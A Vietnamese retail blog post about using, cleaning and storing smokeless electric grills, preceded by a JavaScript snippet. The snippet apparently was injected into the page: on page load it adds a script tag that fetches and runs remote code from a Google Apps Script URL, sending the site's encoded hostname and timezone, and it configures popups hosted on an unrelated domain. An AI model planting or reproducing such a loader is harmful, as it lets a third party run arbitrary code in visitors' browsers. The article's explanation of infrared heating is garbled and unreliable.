var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách sử dụng bếp nướng điện an toàn, hiệu quả và lâu bền nhất

Bếp nướng điện không khói, vỉ nướng điện được ưa chuộng sử dụng bởi tính năng tiện lợi và có mặt trong mọi bữa tiệc liên hoan ở gia đình hay bạn bè. Với chiếc bếp nướng điện là bạn đã có món nướng thơm ngon đậm hương vị như ngoài hàng. Tuy nhiên, có rất nhiều người chưa biết cách sử dụng dụng bếp nướng điện này đúng cách, khiến cho tuổi thọ bị giảm đi. Hãy cùng mình tìm hiểu cách sử dụng bếp nướng điện đúng chuẩn nhất nhé.

Trong tiết trời se se lạnh, được quây quần bên bạn bè và người thân, thưởng thức những món đồ nướng thơm ngon thì còn gì tuyệt vời hơn. Ngoài sử dụng lò nướng thì ngày nay bếp nướng điện không khói không còn quá xa lạ với tất cả mọi người nữa. Nhưng thực thế vẫn có khá nhiều bạn mua sản phẩm về rồi mà vẫn không biết cách sử dụng sao cho đúng và hiệu quả nhất. Chính vì thế, hôm nay 2momart sẽ chia sẻ với mọi người cách sử dụng bếp nướng điện không khói an toàn đơn giản chỉ cần một vài bước chuẩn bị để bạn và gia đình có một bữa tiệc nướng hấp dẫn nhất nhé.

Tìm hiểu chung về bếp nướng điện trên thị trường hiện nay

Bếp nướng điện là món dụng cụ mà các gia đình hiện đại ngày nay không thể không sở hữu một chiếc. Không chỉ giúp hương vị thơm ngon, chế biến nhanh chóng mà còn mang lại cảm giác thú vị khi vừa chế biến và đồng thời thưởng thức món ăn cùng lúc, đồ nướng trở thành sự lựa chọn hoàn hảo của nhiều người trong các bữa tiệc liên hoan gia đình hay hội họp với bạn bè.

Có thể nói, trong vài năm trở lại đây, những chiếc bếp nướng điện đang “lên ngôi” trong nhóm các đồ gia dụng tại thị trường hàng tiêu dùng của nước ta. Thế nhưng bạn đã hiểu rõ hết về bếp nướng điện hay chưa? Ngay sau đây là câu trả lời dành cho bạn.

1.1 Bếp nướng điện là gì? Ưu điểm của bếp nướng điện là gì?

Bếp nướng điện là một loại bếp sử dụng nguồn điện để làm nóng hệ thống nhiệt. Nhiệt từ đó sẽ được sử dụng trực tiếp (bếp nướng dạng vỉ, hơi nóng tỏa ra từ các thanh nhiệt sẽ tác dụng trực tiếp lên thực phẩm để làm chín chúng) hoặc gián tiếp (bếp nướng dạng khay, nhiệt được tản đều ra khắp khay nướng. Thực phẩm nhờ vậy mà sẽ được làm chín.)

Nhiệt lượng được điều chỉnh cao hay thấp bằng nút điều chỉnh được bố trí trên thân bếp. Mỗi loại bếp sẽ được thiết kế theo một cách thức khác nhau. Bếp nướng điện hiện nay còn được tích hợp thêm nhiều tính năng khác như bếp kết hợp nồi lẩu song song.

Tìm hiểu chung về bếp nướng điện Tìm hiểu chung về bếp nướng điện để sử dụng an toàn nhất

➥ Ưu điểm của bếp nướng điện

● Đồ nướng thơm ngon và giữ được nhiều chất dinh dưỡng hơn.

● Nướng chín thực phẩm nhanh hơn giúp tiết kiệm thời gian.

● Vệ sinh bếp nướng không khói vô cùng đơn giản và tiện lợi.

● Dễ dàng điều chỉnh nhiệt độ của bếp để phù hợp với nguyên liệu.

● An toàn hơn với sức khỏe.

● Vì bếp không tạo khói nên bạn có thể nướng ở không gian hẹp, kín.

1.2 Nguyên lý hoạt động của bếp nướng điện

Bếp nướng điện nướng chín thức ăn bằng nhiệt. Tia này là ánh sáng tự nhiên có 7 sắc cầu vồng từ đỏ đến tím. Trong các tia đó thì tia đỏ có bức xạ nhiệt mạnh nhất giúp thức ăn chín nhanh chóng. Các bạn có thể yên tâm vì tia hồng ngoại rất an toàn cho sức khỏe không gây ảnh hưởng gì đến sức khỏe của chúng ta mà thậm chí nó còn được sử dụng trong các thiết bị y tế chăm sóc sức khỏe.

Yếu tố giúp thức ăn chín nhanh chóng là nhờ chất liệu thủy tinh hữu cơ trên mặt bếp bao gồm nhiều thấu kính hội tụ có khả năng phát nhiệt mạnh từ tia hồng ngoại của bếp truyền sang, do đó hiệu suất sử dụng nhiệt rất cao. Thêm vào đó, bếp nướng điện không khói có khả năng nướng chín thực phẩm tươi sống và cả thực phẩm khô một cách nhanh chóng.

Bạn cũng không cần lo lắng về vấn đề sức khỏe khi nướng thức ăn trực tiếp bằng bếp này bởi nó không phóng điện, không tạo từ tính và không rò rỉ. Mặt khác, tia hồng ngoại không tạo ra khí ga và khí CO2 như bếp than do đó cực kỳ an toàn cho người sử dụng.

Nguyên lý hoạt động Nguyên lý hoạt động của bếp nướng điện theo cơ chế vòng cung

1.3 Tại sao nên sử dụng bếp nướng điện?

Tuy rằng phần đông đều yêu thích thiết bị gia dụng tiện lợi này. Nhưng cũng sẽ có người không thích thú nhiều với cách thức chế biến món ăn này và họ ưa chuộng cách chế biến truyền thống hơn. Vì thế, những giải thích về bếp nướng điện dưới đây sẽ phù hợp nhất với những ai có nhu cầu và sở thích ăn các món nướng.

➥ Đồ nướng thơm ngon và không có khói trong quá trình sử dụng

Một trong những nguyên nhân khiến cho nhiều người tiêu dùng yêu thích sản phẩm này. Đó chính là đồ ăn được nướng chín đều và không bị ám khói như khi nướng than truyền thống. Điều này giúp cho người dùng có thể thoải mái tận hưởng bữa ăn cùng bạn bè và người thân ngay cả khi ở trong nhà khép kín như chung cư chẳng hạn. Đây cũng được cho là ưu điểm của thiết bị này so với bếp nướng than truyền thống.

➥ Vệ sinh vô cùng đơn giản và tiện lợi

Nếu các khay nướng từ bếp nướng cồn, vỉ nướng, bếp nướng than rất khó vệ sinh, nhiều vết bẩn bám lên trong quá trình sử dụng rất khó chùi rửa. Thì bếp điện lại tối ưu được vấn đề này một cách tốt nhất. Đặc biệt là loại bếp nướng dạng khay. Hầu như các khay nướng đều được tráng một lớp men chống dính cao cấp trên bề mặt nên chỉ cần rửa nhẹ nhàng, những phần thức ăn thừa sẽ nhanh chóng được làm sạch.

➥ Tùy ý điều chỉnh được nhiệt độ của bếp khi đang nướng

Nếu đã từng nướng bằng bếp than, hay bếp cồn. Bạn chỉ có thể áng chừng được độ lớn của lửa. Vậy nên thức ăn rất dễ bị cháy khét và cho kết quả không như mong muốn. Những phần khét đó tiềm ẩn nguy cơ gây ung thư khá cao.

Chính vì thế, khả năng điều chỉnh nhiệt độ nướng của bếp trong khoảng 80 đến 240 độ C là điều mà rất nhiều khách hàng yêu thích khi sử dụng. Giúp cho bạn có thể nướng linh hoạt nhiều thực phẩm khác nhau. Thêm vào đó, có thể điều tiết được thời gian làm chín thực phẩm hợp lý cho những cuộc trò chuyện và giao lưu chia sẻ trong mỗi bữa ăn.

Ưu điểm của bếp nướng điện Ưu điểm của bếp nướng điện là an toàn và tiện nghi

➥ An toàn hơn cho sức khỏe người dùng

Bếp than, bất kể là than gì cũng có thể sản sinh ra các loại khí độc hại trong quá trình đốt cháy trong thời gian dài. Bếp ga, bếp từ chính hãng hay bếp cồn có thể gây cháy nổ, không an toàn cho sức khỏe khi sử dụng. Đối với bếp điện, bạn hoàn toàn có thể khắc phục được vấn đề này. Thêm vào đó, các loại bếp dùng điện thường có thiết kế kèm theo khay chứa dầu mỡ thừa từ thực phẩm khi nướng, giảm tối đa lượng cholesterol nạp vào cơ thể. Giảm nguy cơ mắc các bệnh về tim mạch cho người sử dụng.

➥ Nướng chín nhanh hơn, tiết kiệm thời gian

Đối với các loại bếp truyền thống, bạn sẽ mất một khoảng thời gian khá dài để lửa bén và bếp nóng lên. Trong khi bếp điện chỉ cần cắm trong khoảng 1-2 phút là bạn đã có thể tùy chỉnh nhiệt độ theo ý muốn. Vậy nên, thực phẩm chắc chắn sẽ chín nhanh hơn, giữ được dưỡng chất nhiều hơn. Thời gian bạn dùng để nướng chín các loại đồ ăn cũng vì thế mà được rút ngắn lại. Quả là một sản phẩm tiện lợi phải không nào?

1.4 Phân loại vỉ nướng của bếp nướng điện

Vỉ nướng điện (vỉ nướng) cấu thành từ chất liệu thép phủ nhôm cao cấp, có đúc kết theo khuôn hình, phủ lớp bề mặt chống dính, được kiểm nghiệm về độ an toàn, không hề gây độc hại khi đun trên nhiệt độ cao. Với chất liệu này có khả năng dẫn nhiệt, chịu nhiệt rất hiệu quả, ngăn ngừa bám dính thức ăn vào bề mặt. Với các loại vỉ nướng thông thường thì bề mặt hạn chế được ít lượng thức ăn bám vào, nên độ bám sát thức ăn vẫn thường xảy ra.

Bếp nướng điện có vỉ nướng Mô tả chi tiết Ưu điểm vỉ nướng Nhược điểm vỉ nướng Vỉ nướng có khe rãnh thoát mỡ Nếu chọn loại bếp có vỉ nướng được thiết kế nhiều khe rãnh trên bề mặt. Dầu mỡ từ thực phẩm chảy xuống khay bên dưới thông qua các khe rãnh. Món nướng thơm ngon, không bị ám mùi dầu mỡ. Bề mặt vỉ có phủ một lớp chống dính giúp thực phẩm không bám sát mặt vỉ. Khi lớp chống dính dần mất đi, món ăn dễ bị cháy khét. Nếu có thức ăn rơi xuống rãnh, việc lau chùi trở nên khó khăn Vỉ nướng chống dính dạng mặt phẳng Loại bếp dùng vỉ nướng phẳng chỉ có duy nhất một khe rãnh nhỏ để thoát mỡ Tránh tình trạng đồ ăn rơi xuống rãnh. Việc lau chùi, vệ sinh dễ dàng. Phù hợp để nướng xúc xích hay các loại rau củ. Chất lượng nấu ăn không ngon, giống như cách chế biến “áp chảo”. Vỉ nướng chống dính 2 trong 1 (có rãnh thoát mỡ và có mặt phẳng chống dính) Kiểu vỉ nướng này dùng để nướng thịt một bên, bên còn lại dùng để nướng rau củ, xúc xích. Nướng cùng lúc nhiều thực phẩm nhưng không lo chúng bị lẫn mùi với nhau. Hầu hết các sản phẩm trên thị trường đều có phần nướng thịt với khe rãnh khá rộng, thịt dễ rơi xuống bên dưới.

Bếp nướng điện sang trọng Bếp nướng điện được yêu thích nhất hiện nay

Cách sử dụng bếp nướng điện không khói để đảm bảo an toàn

Sử dụng bếp nướng điện là một lựa chọn tuyệt vời cho những bữa ăn gia đình. Bếp nướng điện là sản phẩm hiện đại, tiện dụng, nhỏ gọn như là bếp điện từ hay bếp hồng ngoại bạn có thể dễ dàng di chuyển theo những địa điểm mà bạn mong muốn.

Ngoài ra mùi vị thơm ngon mà đồ nướng từ bếp nướng mang lại cũng làm bạn không thể nào cưỡng lại được, hương vị sẽ ngon đúng điệu hơn là bạn tận dụng bếp hồng ngoại để nướng đồ. Cách sử dụng bếp điện đúng cách là như thế nào? Bỏ túi vài kinh nghiệm sau đây bạn nhé!

2.1 Chuẩn bị nguyên liệu tươi ngon trước khi nướng

Việc đầu tiên khi bạn sử dụng bếp nướng điện là bạn cần làm là chuẩn bị những nguyên liệu tươi ngon nhất để chế biến. Các món ăn sẽ trở nên hấp dẫn và giàu chất dinh dưỡng hơn nếu bạn chọn được nguyên liệu tươi ngon. Nếu bạn nướng thịt, thì nên chọn loại nhiều nạc ít mỡ để hạn chế chất béo và tránh xảy ra tình trạng thịt bị cháy xém sinh khói và chất độc hại.

Chuẩn bị nguyên liệu tươi ngon Chuẩn bị nguyên liệu tươi ngon trước khi nướng là điều quan trọng

2.2 Làm nóng bếp nướng điện trước khoảng 5 phút

Một điều đơn giản nhưng rất ít ai chú ý là trước khi nướng thịt khoảng 5 phút, bạn nên làm nóng bếp. Như vậy, nhiệt độ sẽ được phân bố đều trên bề mặt bếp nướng. Đồng thời, đừng quên quét một lớp dầu ăn mỏng trên mặt bếp trước khi sử dụng để hạn chế tình trạng cháy xém thịt.

Chỉ mất chút ít thời gian là bạn đã có cho mình món nướng ngon tuyệt vời, đáp ứng nhu cầu ẩm thực phong phú của các thành viên trong gia đình mình. Khác với sử dụng bếp điện từ để nướng đồ ăn, khi sử dụng bếp nướng điện đồ ăn của bạn ngon hơn, bếp không bị ảnh hưởng và nướng dễ dàng hơn trên bề mặt của bếp điện từ.

2.3 Điều chỉnh nhiệt độ nướng phù hợp với từng loại thực phẩm

Bếp nướng không khói sẽ có mức điều chỉnh nhiệt độ từ 80 độ C đến 240 độ C. Tùy vào độ dày và tính chất của thực phẩm mà bạn cài đặt nhiệt độ nướng thích hợp. Với các loại thịt nướng được thái dày, bạn nên để nhiệt độ thấp trước rồi tăng dần lên. Không nên để quá cao lúc ban đầu sẽ khiến thịt cháy xém bên ngoài, nhưng thực tế bên trong vẫn chưa chín tới.

Đối với rau củ quả mềm như dưa leo, đậu bắp, cà chua,… bạn chỉ nên để ở mức thấp nhất 80 độ C. Còn với các loại cứng hơn thì có thể tăng nhiệt độ lên cao.

Bước tiếp theo bạn cần cắm phích vào ổ điện điều chỉnh cho hợp lý để bếp nướng điện nóng lên. Sau khi bếp nóng bạn cần dùng cọ hoặc muỗng quét một chút dầu ăn lên bề mặt bếp.

Trong khi nướng, nên trải đều để thực phẩm chín đều và nhanh chín hơn. Bạn có thể đảo, lật đều tay để thức ăn nhanh chín và được thơm ngon, màu bắt mắt. Đối với những loại thịt dày, lâu chín bạn nên nướng ở mức nhiệt thấp để thịt chín từ từ, tránh nướng ở nhiệt độ quá cao dẫn đến cháy mặt ngoài mà bên trong vẫn chưa chín.

Sử dụng bếp nướng điện Sử dụng bếp nướng điện đúng cách an toàn và hiệu quả

2.4 Không làm bong tróc, trầy xước bề mặt bếp nướng

Bề mặt bếp nướng điện rất quan trọng vì đây là nơi tiếp xúc trực tiếp với thực phẩm vì vậy khi sử dụng bếp nướng chúng ta cần lưu ý đến việc bảo quản bề mặt cũng như lớp chống dính. trong quá trình sử dụng bạn nên dùng các dụng cụ bằng gỗ, thìa gỗ để đảo thức ăn. Tránh dùng những vật nhọn hoặc kim loại có thể gây bong tróc hoặc xước chống dính.

Cách vệ sinh và bảo quản bếp nướng điện đúng cách nhất

Bếp nướng điện ngày nay được rất nhiều gia đình lựa chọn vì tính tiện dụng cũng như khả năng nướng thức ăn nhanh chóng. Tuy nhiên làm thế nào để vệ sinh bếp nướng điện sau khi sử dụng và bảo quản bếp nướng điện hiệu quả thì không phải ai cũng biết.

3.1 Cách vệ sinh bếp nướng sau khi sử dụng

Khi vệ sinh bếp nướng điện bạn cũng nên làm theo đúng trình tự để bếp được có tuổi thọ lâu nhất.

Bước 1: Rút nguồn điện và làm sạch bề mặt bếp

Sau khi rút phích ra khỏi ổ cắm điện, bạn đợi tới khi bếp nướng điện nguội hẳn thì bắt đầu vệ sinh. Bạn có thể làm sạch bề mặt bếp nướng điện bằng chất tẩy rửa bát trung tính, có độ bào mòn thấp và sử dụng khăn ướt đã vắt khô. Lưu ý là khi lau chùi bề mặt mâm nướng điện cần nhẹ nhàng để tránh gây bong tróc lớp chống dính.

Ngoài ra, bề mặt nướng đa phần là sử dụng lớp chống dính nên bạn có thể dùng nước sôi đổ lên bề mặt bếp và dùng khăn lau hoặc giấy ăn lau khô bếp để mọi vết dầu mỡ đều được đánh bay.

Bước 2: Vệ sinh khay nướng

Với những loại bếp nướng có khay hứng dầu mỡ tách riêng, bạn tiến hành tháo rời mâm nướng với khay hứng dầu mỡ ra, tiếp theo dùng miếng bọt biển đã có chất tẩy rửa để lau chùi các vết dầu mỡ bám bẩn ở khay nướng, loại có khe rãnh hở cần rửa kỹ các rãnh.

Bước 3: Làm sạch xung quanh bếp nướng điện

Sau khi đã làm sạch các bộ phận có thể tháo rời, bạn cần chốt lại bằng việc vệ sinh bộ phận xung quanh bếp bằng khăn khô. Tuyệt đối tránh để nước ngấm vào nơi cắm nguồn điện.

Cách vệ sinh bếp nướng điện Cách vệ sinh bếp nướng điện để bảo quản bếp an toàn nhất

3.2 Cách bảo quản bếp nướng điện để tăng tuổi thọ bếp

➥ Nên sử dụng những dụng cụ bằng gỗ khi nướng thức ăn

Vì là nơi tiếp xúc trực tiếp với thực phẩm nên bề mặt nướng của bếp rất quan trọng. Mọi người phải đặc biệt lưu ý đến việc bảo quản bộ phận này khi sử dụng bếp nướng điện. Khi nướng bạn tránh dùng các dụng cụ bằng inox, kim loại để đảo thức ăn, như vậy sẽ khiến bề mặt bong tróc lớp chống dính.

Để hạn chế lớp chống dính trên bếp nướng điện bị bong tróc, trầy xước ảnh hưởng đến độ bền của bếp, khi nướng bạn nên sử dụng những dụng cụ nấu ăn bằng gỗ hoặc nhựa chịu nhiệt. Tránh sử dụng những vật dụng bằng kim loại sẽ dễ làm trầy xước bề mặt của bếp nướng điện.

Cách sử dụng bếp nướng điện đúng cách Sử dụng bếp nướng điện đúng cách góp phần tăng tuổi thọ bếp

➥ Bảo quản bếp nướng điện ở nơi khô ráo, thoáng mát

Để tăng tuổi thọ cho bếp nướng điện bạn nên cất giữ bếp ở những nơi khô ráo, thoáng mát, tránh để những nơi ẩm ướt sẽ dễ làm gỉ sét hỏng hóc. Bên cạnh đó, bạn nên để bếp nướng điện ở những nơi bằng phẳng, tránh treo bếp nướng sẽ dễ làm rơi rớt làm cong móp, biến dạng bếp nướng.

Các lưu ý khi sử dụng bếp nướng điện bạn nên nắm rõ

Bếp nướng điện ngày nay được rất nhiều gia đình lựa chọn vì tính tiện dụng cũng như khả năng nướng thức ăn nhanh chóng. Tuy nhiên làm thế nào để sử dụng và bảo quản bếp nướng điện hiệu quả thì không phải ai cũng biết.

➥ Không được làm ướt bộ phận tiếp điện của bếp

Khi lau chùi vệ sinh bếp nướng điện, bạn tuyệt đối không được để nước vào bộ phận tiếp điện của bếp. Việc này rất dễ gây rò điện trong những lần sử dụng tiếp theo, rất nguy hiểm cho người sử dụng.

➥ Không được để bếp nướng nóng quá lâu mà không có thực phẩm

Đối với bếp nướng điện bạn chỉ cần làm nóng trong khoảng 1 – 2 phút là bếp đã đủ độ nóng để nướng thực phẩm rồi. Hạn chế tình trạng để bếp nướng điện nóng quá lâu mà không có thực phẩm bên trên, điều này sẽ làm ảnh hướng tới lớp chống dính của bếp nướng.

Vệ sinh bếp điện cẩn thận Vệ sinh bếp điện an toàn và đúng cách

➥ Không để trẻ em ở gần hoặc sờ vào bếp khi đang sử dụng

Bếp nướng điện có nhiệt độ khá cao khi nướng, vì vậy để an toàn khi sử dụng bạn không nên cho trẻ em lại gần, tránh trường hợp trẻ chạm tay vào bếp dẫn đến bị bỏng…

➥ Nên vệ sinh bếp nướng điện ngay sau khi nướng xong

Sau khi nướng xong, bạn để bếp nướng điện nguội bớt rồi tiến hành vệ sinh. Tránh để tình trạng nướng xong quá lâu rồi mới vệ sinh, do thức ăn bám lâu trên bề mặt bếp nướng sẽ khó vệ sinh hơn, đồng thời cũng sẽ ảnh hưởng tới lớp chống dính, do trong thực phẩm có muối có thể làm ăn mòn lớp chống dính.

Khi vệ sinh bếp nướng điện, cũng tránh dùng đồ chùi nhôm lau rửa, điều này sẽ làm bong tróc lớp chống dính trên bề mặt bếp nướng.

Sử dụng bếp điện an toàn nhất Sử dụng bếp điện trong những buổi tiệc là điều cần thiết

Trên đây là tất cả các thông tin về bếp nướng điện cũng như cách sử dụng bếp nướng điện, cách vệ sinh và bảo quản bếp nướng điện đúng cách và chi tiết nhất dành cho bạn. Cảm ơn bạn đã theo dõi bài viết, nếu thấy hay hãy nhấn mục hữu ích ở cuối bài để ủng hộ mình với nhé.

Đừng quên theo dõi 2momart thường xuyên để cập nhật những tin tức mới nhất cũng như các kinh nghiệm sử dụng mỹ phẩm, kinh nghiệm sử dụng đồ gia dụng trong gia đình mình. Chúc bạn có những phút giây mua sắm vui vẻ cùng 2momart.